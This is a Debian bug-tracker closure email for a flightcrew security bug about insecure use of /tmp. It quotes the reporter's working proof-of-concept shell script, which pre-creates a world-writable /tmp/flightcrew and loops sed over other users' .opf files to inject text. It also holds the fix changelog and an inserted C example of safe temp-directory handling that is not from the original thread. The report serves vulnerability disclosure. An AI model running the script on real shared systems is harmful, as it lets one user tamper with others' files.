Your message dated Mon, 15 May 2017 11:48:37 +0000
with message-id <e1daeup-0007om...@fasolo.debian.org>
and subject line Bug#861987: fixed in flightcrew 0.7.2+dfsg-9
has caused the Debian Bug report #861987,
regarding flightcrew: insecure use of /tmp
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
861987: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=861987
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: flightcrew
Version: 0.7.2+dfsg-8
Tags: security

flightcrew creates temporary files in /tmp/flightcrew/, even when this directory belongs to another user. A malicious user could exploit this to tamper with other users' temporary files, and probably also to overwrite arbitrary files via a symlink attack.

I've attached a proof-of-concept exploit. While it is running, all users will get spurious validation errors:

   $ whoami
   jwilk

   $ ls -ld /tmp/flightcrew/
   drwxrwxrwx+ 3 mallory mallory 60 May  6 22:58 /tmp/flightcrew/

   $ flightcrew-cli EpubValidates_Valid.epub
   EpubValidates_Valid.epub/OEBPS/content.opf(2): error 1105: The <package> element's "version" attribute value needs to be "2.0", but is "
    _______
   < pwned >
    -------
           \   ^__^
            \  (oo)\_______
               (__)\       )\/\
                   ||----w |
                   ||     ||
   ".

--
Jakub Wilk
#!/bin/sh
set -e -u
mkdir -m 777 /tmp/flightcrew
cd /tmp/flightcrew
setfacl -d -m "u:$USER:rwx" .
msg='
 _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
'
msg=$(printf '%s' "$msg" | sed -e 's/\\/\\\\/g' -e 's/</\\\&lt;/g' -e 's/$/\\\&#10;/' | tr -d '\n')
while true
do
     find . -type f -name '*.opf' -exec sed -i -r -e '/<[?]/b' -e "s@version=(\"[^\"]+\"|'[^']+')@version=\"$msg\"@" {} + || true
done

--- End Message ---
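The defender-side counterpart to the report above, as an added example that is not flightcrew's code or the Debian patch: the checks a program should apply before reusing a fixed path like /tmp/flightcrew (real directory, owned by the caller, not writable by others), and the mkdtemp() alternative that avoids a predictable shared name altogether. Function names and the "flightcrew.XXXXXX" template are assumptions.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns 1 if `path` is a directory this process may safely reuse as
 * scratch space, 0 otherwise. The three rejections map onto the report:
 * a symlink or non-directory planted at the path, a directory owned by
 * another user, and a directory that others can write into. */
int is_safe_private_dir(const char *path)
{
    struct stat st;
    if (lstat(path, &st) != 0)          /* lstat: never follow a symlink */
        return 0;
    if (!S_ISDIR(st.st_mode))
        return 0;
    if (st.st_uid != geteuid())         /* belongs to someone else */
        return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH))
        return 0;                       /* others could plant files */
    return 1;
}

/* Creates a fresh 0700 directory under $TMPDIR (default /tmp) with an
 * unpredictable name and stores its path in `out`. Because the name is
 * not fixed, a directory pre-created by another user is never picked up.
 * Returns 0 on success, -1 on failure. */
int make_private_tmpdir(char *out, size_t outlen)
{
    const char *base = getenv("TMPDIR");
    if (base == NULL || *base == '\0')
        base = "/tmp";
    if (snprintf(out, outlen, "%s/flightcrew.XXXXXX", base) >= (int)outlen)
        return -1;
    return mkdtemp(out) == NULL ? -1 : 0;
}

int main(void)
{
    char dir[4096];
    if (make_private_tmpdir(dir, sizeof dir) != 0)
        return 1;
    printf("%s reusable=%d\n", dir, is_safe_private_dir(dir));
    rmdir(dir);
    return 0;
}
```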
--- Begin Message ---
Source: flightcrew
Source-Version: 0.7.2+dfsg-9

We believe that the bug you reported is fixed in the latest version of
flightcrew, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 861...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Mattia Rizzolo <mat...@debian.org> (supplier of updated flightcrew package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


Format: 1.8
Date: Mon, 15 May 2017 13:04:05 +0200
Source: flightcrew
Binary: flightcrew libflightcrew0v5 libflightcrew-dev
Architecture: source
Version: 0.7.2+dfsg-9
Distribution: unstable
Urgency: medium
Maintainer: Mattia Rizzolo <mat...@debian.org>
Changed-By: Mattia Rizzolo <mat...@debian.org>
Description:
 flightcrew - C++ epub validator
 libflightcrew-dev - C++ library development files for epub validation
 libflightcrew0v5 - C++ library for epub validation
Closes: 861987
Changes:
 flightcrew (0.7.2+dfsg-9) unstable; urgency=medium
 .
   * d/copyright: claim copyright for 2017.
   * Add patch to fix a security issue due to insecure use of /tmp.
     Thanks to Jakub Wilk <jw...@jwilk.net> for the report and to
     Thomas Pierson <cont...@thomaspierson.fr> for the patch.
     Closes: #861987


--- End Message ---
